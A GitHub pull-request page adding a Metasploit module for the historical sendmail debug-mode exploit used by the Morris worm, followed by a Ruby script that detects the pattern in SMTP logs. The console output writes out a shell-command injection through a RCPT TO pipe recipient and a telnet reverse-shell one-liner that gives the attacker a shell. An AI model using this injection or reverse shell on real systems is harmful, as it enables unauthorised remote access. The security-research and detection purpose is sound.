
Add Morris worm sendmail debug mode exploit #10836

Merged
merged 8 commits into from
Nov 2, 2018

Conversation

wvu
Contributor

@wvu wvu commented Oct 20, 2018

msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   25               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)version.c       5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Sending:  PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?

#10700

@wvu wvu added module blocked Blocked by one or more additional tasks feature needs-docs labels Oct 20, 2018
@wvu wvu force-pushed the feature/sendmail branch 5 times, most recently from c83c2b6 to b9c16e7 Compare October 20, 2018 17:50
@wvu wvu force-pushed the feature/sendmail branch 3 times, most recently from 6a75c75 to 5e71699 Compare October 20, 2018 18:52
@wvu wvu force-pushed the feature/sendmail branch 3 times, most recently from 7afbd52 to e87c9f5 Compare October 24, 2018 06:28
@wvu wvu changed the title [WIP] Add Morris worm sendmail debug mode exploit Add Morris worm sendmail debug mode exploit Oct 24, 2018
@wvu wvu removed the blocked Blocked by one or more additional tasks label Oct 29, 2018
@busterb busterb self-assigned this Nov 2, 2018
@busterb busterb merged commit 458f635 into rapid7:master Nov 2, 2018
@busterb
Member

busterb commented Nov 2, 2018

Release Notes

This adds a module exploiting sendmail's well-known historical debug mode to escape to a shell and execute commands in the SMTP RCPT TO command. This vulnerability was exploited by the Morris worm on 1988-11-02.
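The detection side of what the module output and the release note describe: the non-standard DEBUG verb and a RCPT TO address whose local part is a "|program" pipe are the two things that separate this session from ordinary mail. The following Ruby is an added example, not code from the Metasploit module, from sendmail or from this PR. It scans the client half of an SMTP session as a proxy or packet capture would log it (one command per line) and returns one finding per indicator. The session text is constructed here, modeled on the module's "Sending:" lines with the shell payload replaced by a placeholder, and the function names are my own.

```ruby
# Flag the sendmail debug-mode / pipe-recipient pattern in an SMTP client log.
# Added example; assumes the log holds only client commands, one per line.

SMTP_VERBS = %w[HELO EHLO MAIL RCPT DATA RSET NOOP QUIT VRFY EXPN HELP].freeze

# Pull the address out of a MAIL FROM:/RCPT TO: argument, unwrapping a
# quoted local part so that  TO:<"| sed '1,/^$/d' | sh; exit 0">
# yields  | sed '1,/^$/d' | sh; exit 0
def smtp_path(arg)
  m = arg.match(/<(.*)>/m)
  return nil unless m
  path = m[1]
  path = path[1..-2] if path.start_with?('"') && path.end_with?('"')
  path
end

# Returns an array of { line:, indicator:, detail: } hashes. Message bodies
# (between DATA and the lone ".") are skipped so mail content cannot trip
# the command-level checks.
def scan_smtp_session(session_text)
  findings = []
  in_data = false
  session_text.each_line.with_index(1) do |raw, lineno|
    line = raw.chomp
    if in_data
      in_data = false if line == '.'
      next
    end
    verb, arg = line.split(/\s+/, 2)
    next if verb.nil?
    verb = verb.upcase
    arg ||= ''
    if verb == 'DEBUG'
      findings << { line: lineno, indicator: :debug_verb,
                    detail: 'sendmail debug mode requested' }
    elsif verb == 'RCPT'
      path = smtp_path(arg)
      if path && path.lstrip.start_with?('|')
        findings << { line: lineno, indicator: :rcpt_pipe, detail: path.lstrip }
      end
    elsif verb == 'DATA'
      in_data = true
    elsif !SMTP_VERBS.include?(verb)
      # Any other verb the server should not know is worth a look too.
      findings << { line: lineno, indicator: :unknown_verb, detail: verb }
    end
  end
  findings
end

# Constructed session modeled on the module's "Sending:" lines; the shell
# payload is a placeholder.
SAMPLE_SESSION = <<~'SMTP'
  HELO attacker.example
  DEBUG
  MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
  RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
  DATA
   PATH=/bin:/usr/bin:/usr/ucb:/etc
  export PATH
  sh -c 'echo placeholder-command'
  .
  QUIT
SMTP

# Constructed ordinary delivery for comparison.
BENIGN_SESSION = <<~'SMTP'
  EHLO mail.example
  MAIL FROM:<alice@example>
  RCPT TO:<bob@example>
  DATA
  Subject: hello

  body text
  .
  QUIT
SMTP

if __FILE__ == $PROGRAM_NAME
  scan_smtp_session(SAMPLE_SESSION).each do |f|
    puts "line #{f[:line]}: #{f[:indicator]} #{f[:detail]}"
  end
end
```

Running it prints a finding for line 2 (DEBUG) and line 4 (the pipe recipient) of the sample session and nothing for the benign one; the body lines after DATA are ignored on purpose, since the shell script travelling in the message body is only reachable because of the recipient, so the recipient is the stable thing to alert on.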

4 participants